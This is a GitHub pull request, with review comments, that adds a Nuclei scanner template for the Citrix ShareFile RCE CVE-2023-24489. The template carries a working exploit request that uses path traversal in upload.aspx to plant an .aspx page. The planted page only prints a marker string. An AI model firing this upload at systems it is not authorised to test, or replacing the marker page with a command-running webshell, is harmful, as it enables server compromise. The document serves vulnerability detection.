### PR TITLE
CVE-2023-24489 🔥 Citrix ShareFile StorageZones Controller - RCE

### PR DESCRIPTION
**Pull request by DhiyaneshGeek**
### Template / PR Information

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template Validation
```
nuclei -u http://127.0.0.1:8080 -t CVE-2023-24489.yaml -tags fuzz
```

This template will not running on default scan, user's need to supply ```-tags fuzz```  in order to run this template 

I've validated this template locally?
- [x] YES
- [ ] NO

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)

### CODE REVIEW

File: http/cves/2023/CVE-2023-24489.yaml [hunk 1]
```diff
@@ -0,0 +1,61 @@
+id: CVE-2023-24489
+
+info:
+  name: Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution
+  author: DhiyaneshDK,dwisiswanto
```
Comment (dwisiswant0) [inline http/cves/2023/CVE-2023-24489.yaml:5]:
```suggestion
  author: DhiyaneshDK,dwisiswant0
```

File: http/cves/2023/CVE-2023-24489.yaml [hunk 2]
```diff
@@ -0,0 +1,61 @@
...
+    verified: true
+  tags: cve,cve2023,sharefile,rce,intrusive,fileupload,fuzz
+
+variables:
+  test_file: '{{rand_base(8)}}'
+
+http:
+  - raw:
+      - |
+        POST /documentum/upload.aspx?parentid={{padding}}&raw=1&unzip=on&uploadid={{test_file}}\..\..\..\cifs&filename={{test_file}}.aspx HTTP/1.1
```
Comment (dwisiswant0) [inline http/cves/2023/CVE-2023-24489.yaml:28]: I think the encoding should be done in the template, not in the payloads.

```suggestion
        POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{test_file}}\..\..\..\cifs&filename={{test_file}}.aspx HTTP/1.1
```

File: http/cves/2023/CVE-2023-24489.yaml [hunk 3]
```diff
@@ -0,0 +1,61 @@
...
+        {
+            Response.Write("<pre>");
+            Response.Write(Server.HtmlEncode(ExcuteCmd()));
+            Response.Write("</pre>");
+        }
+        string ExcuteCmd()
+        {
+            return "CVE-2023-24489 (Citrix ShareFile RCE)";
+        }
+        </script>
```
Comment (dwisiswant0) [inline http/cves/2023/CVE-2023-24489.yaml:45]: `System.Diagnostics` and `System.IO` are not used anywhere.

```suggestion
        POST /documentum/upload.aspx?parentid={{padding}}&raw=1&unzip=on&uploadid={{test_file}}\..\..\..\cifs&filename={{test_file}}.aspx HTTP/1.1
        Host: {{Hostname}}

        <%@ Page Language="C#" Debug="true" Trace="false" %>
        <script Language="c#" runat="server">
        void Page_Load(object sender, EventArgs e)
        {
            Response.Write("{{randstr}}");
        }
        </script>
```

**Review by dwisiswant0 — COMMENTED** [review]
Just a few minor suggestions.

**Review by ehsandeep — APPROVED** [review]

**Pull request merged**